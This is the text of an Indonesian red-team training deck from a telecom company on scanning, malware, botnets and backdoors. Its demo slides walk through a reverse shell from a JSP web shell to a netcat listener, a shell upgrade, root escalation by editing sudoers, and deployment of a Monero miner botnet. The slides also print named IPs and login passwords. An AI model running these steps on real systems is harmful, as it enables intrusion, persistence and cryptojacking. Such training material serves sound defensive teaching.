Vulnerability Assessment

Malware/Botnet distribution

company confidential

RED Team

PT XL Axiata, Tbk.

2company confidential

Siapa kami?

Andi IsmayadiLead – Hacking and Defense XL Axiata+62 877 8003 2666Andi.ismayadi@gmail.com

Pecinta Kopi, Fotografi dan Traveling

Hacktivist dari tahun 2003

Saat ini memimpin 6 orang technical team di XL sebagaitim Hacking dan Defense (Red team dan Blue team)

Memimpin Red Team XL Axiata sebagai pemenang Bug Bounty Award dan di nobatkan sebagai Best Hacking Team di antara Perusahaan Axiata di Asia

3company confidential

Siapa kami?

Achmad Riyandika Zazuly (ariz)Penetration Tester+62 8788 77 88 99 4ariyandika@xl.co.id

Ariz sudah terjun di dunia IT security sejak ia masih duduk di bangku Sekolah Menengah Pertama.

Berpengalaman di bug bounty program, tes aplikasi mobile, aplikasi web, API dan Internet of Things

Berperan sejak tahun 2016 dalam mengamankan produk-produk XL termasuk produk XL prepaid, XL postpaid, mobilebroadband dan produk Axis

4company confidential

Siapa kami?

Anjaswari CuranjayaIT Security Enthusiast+62 87876106163anjasw@xl.co.id

Programmer yang menyukai IT Security

Pentester di PT XL Axiata

Top Hall of Fame Tokopedia Bug Bounty Program

Axiata 2018 Best Hacker

5company confidential

APA ITU SCANNING DAN TUJUANNYA?

Scanning merupakan teknik untuk mendapatkan informasi lebih teknis

dari target kita

Dengan melakukan scanning maka kita paham secara teknis akan apa

target kita.

Kita dapat tahu service apa yang di jalankan, target mana yang UP, port

mana yang terbuka, dan jenis OS yang di jalankan

6company confidential

TOOLS

Superscan (Network and port scanner)

Angry IP Scanner (Network and port

scanner)

Nmap (Network and port scanner)

Nessus (Vulnerability Scanner)

7company confidential

MACAM SCANNING

Scanning dibagi 3 Network Scanning

Bertujuan untuk mendapatkan informasi system manayang up dan running dari IP range yang di dapat

Port ScanningSetelah mendapatkan IP mana yg up dan running

selanjutnya adalah mendapatkan informasi ttg port manayang up.

Vulnerability ScanningSelanjutnya adalah dengan melakukan vulnerability

scanning untuk mendapatkan kerentanan dari sistem target kita, informasi ini untuk melakukan serangan di tahapberikutnya.

8company confidential

NETWORK SCANNER

Atau dengan menggunakan Nmap yang bisa running pada multi OS (linux,

windows, Mac OSX). Dengan perintah nmap –sP 1.2.3.0/24 maka akan

melakukan IP Range scanning untuk mengetahui IP mana yang hidup.

9company confidential

VULNERABILITY SCANNER

Salah satu alat yang paling

ampuh dalam melihat

kerentanan yang ada di

dalam suatu system adalah

Nessus.

Tools ini membantu attacker

untuk melihat apa saja

kerentanan yg ada dan

setelahnya dapat melakukan

serangan yang terarah.

Silahkan download Nessus di laman https://www.tenable.com/try

10company confidential

Pengertian Malware

Malware adalah software berbahaya yang terinstal di suatu sistem dan menjalankan tugas berbahaya.

Contoh: Mencuri data, mengontrol OS yang terinfeksi, menginfeksi komputer lain.

11company confidential

Contoh : Crypto-Mining malware trend 2018

12company confidential

Bagaimana malware menyebar?

13company confidential

Botnet & CNC Server

Botnet adalah sekumpulan program yang saling

terhubung melalui Internet yang berkomunikasi

dengan server pusat untuk melakukan tugas

tertentu

CNC Server adalah mesin yang di kontrol oleh

penyerang yang digunakan untuk mengirim

perintah dan menerima laporan dari botnet

14company confidential

Pengertian Backdoor

Backdoor adalah suatu metode yang digunakan penyerang untuk melewati proses normal masuk ke sistem.

Normal akses: Untuk masuk ke server linux, biasanya sysadminmenggunakan service ssh dan menggunakan

autentikasi username dan password

Akses Backdoor: Penyerang yang berhasil mengupload fileberbahaya ke server, maka ia bisa mengakses

kembali file tersebut untuk melakukan kontrol terhadap server tanpa melewati proses normal autentikasi menggunakan service ssh

15company confidential

Tipe Backdoor

Web Backdoor

Service Backdoor

Akun Backdoor

dll

16company confidential

Terima Kasih

17company confidential

Sesi Demo

Demo 1: Backdooring & Lateral Movement ke sistem lain

Demo 2: Infeksi server dengan monero miner botnet

18company confidential

Demo 1: Backdooring & Lateral Movement ke sistem lain

19company confidential

Ulasan: Backdooring & Lateral Movement ke sistem lain

Biasanya penyerang tidak cukup menyerang 1 sistem, melainkan mereka berusaha untuk menginfeksi sistem internal lainnya yang bisa diakses dari mesin utama yang pernah diserang.

The Enterprise

Eksternal

Web Server

Databases

The Internet

Firewall

IDS/IPS

80

Internal

Server

Internal

Server

20company confidential

Persiapan: Backdooring & Lateral Movement ke sistem lain

Persiapan:

1. File backconnect.sh

2. Server eksternal untuk melakukan penyerangan

Server: 103.20.167.23

Username 1: demo1

Password 1: N0ts4f#e!!for##worKN#*E(@y8ee

Username 2: demo2

Password 2: N0ts4f#e!!for##worKN#*E(@y8ff

21company confidential

Demo 1: Backdooring & Lateral Movement ke sistem lain

1. Login SSH ke server 103.20.167.23:

ssh 103.20.167.23 –l demo1

2. ketik perintah untuk buka port:

nc –nlvp 8081

3. Akses backdoor file ke url: http://178.128.29.166:8080/assets/css.jsp

4. Upload file connectback.sh

5. pilih command executor, dan masukan perintah berikut:

bash connectback.sh

22company confidential

Demo 1: Backdooring & Lateral Movement ke sistem lain

5. Jika file connectback berhasil, maka tampilannya sebagai berikut:

6. Agar leluasa dalam mengontrol server target, ketik perintah berikut:

/bin/sh -i

python -c 'import pty; pty.spawn("/bin/sh")'

Export TERM=xterm

23company confidential

Bagaimana cara mendapatkan akses root?

24company confidential

Demo 1: Lateral Movement ke sistem lain

1. Ketik perintah untuk mendapatkan informasi terkait file yang world writable:

find / -perm -o+w | more

Periksa file-file yang mencurigakan

2. Injeksi perintah berikut untuk eskalasi user tomcat ke sudo

echo "tomcat ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers

3. ketik perintah “sudo su” untuk mendapatkan akses root

4. langkah selanjutnya adalah mencari informasi terkait server mana saja yang punya keterkaitan dengan server 178.128.29.166

25company confidential

Demo 2: Monero miner – malware distribution

26company confidential

Persiapan: Monero miner – malware distribution

Persiapan:

1. File malware: miner.zip

2. Server eksternal sebagai cnc server: 45.77.240.75

3. Server eksternal sebagai botnet: 178.128.29.166

27company confidential

Demo 1: Monero miner – malware distribution

1. Login RDP ke server 45.77.240.75 kemudian copy file miner.zip

2. Ekstrak file miner.zip dan temukan file berikut pada folder miner-server:

3. Membuka service CNC: Klik kanan dan “Run as administrator” pada file xmrigCCserver.exe

4. Temukan file xmrigDaemon, xmrigMiner dan config.json kemudian copy ke server 178.128.29.166

5. Pada server 178.128.29.166, jalankan perintah berikut:

./xmrigDaemon

28company confidential

Tampilan CNC dashboard

Untuk cek CNC dashboard, akses urlberikut di browser: http://45.77.240.75

Username: botnet

Password: cncserver

29company confidential

Kesimpulan

1. Dari 1 server eksternal yang berhasil diserang 178.128.29.166, ternyata ditemukan server lain yang punya keterkaitan dengan server yang pertama kali diserang.

Disinilah penyerang harus menggali informasi yang dalam terkait sistem yang pernah ia ambil alih.

2. Sebisa mungkin untuk mendapatkan akses setara user“root”. Hal ini untuk memudahkan penyerang dalam mendapatkan informasi tambahan

3. Lateral movement sangat berperan penting dalam distribusi malware crypto-mining

4. Pada umumnya, sistem-sistem korporasi masih menggunakan password yang sama untuk beberapa akun dan

akses server. Hal tersebut memudahkan penyerang untuk mendapatkan banyak akses ke server lain / lateral movement

Eksternal

Web Server

178.128.29.166

Internal

Web Server

45.77.240.75

Internal

Web Server

X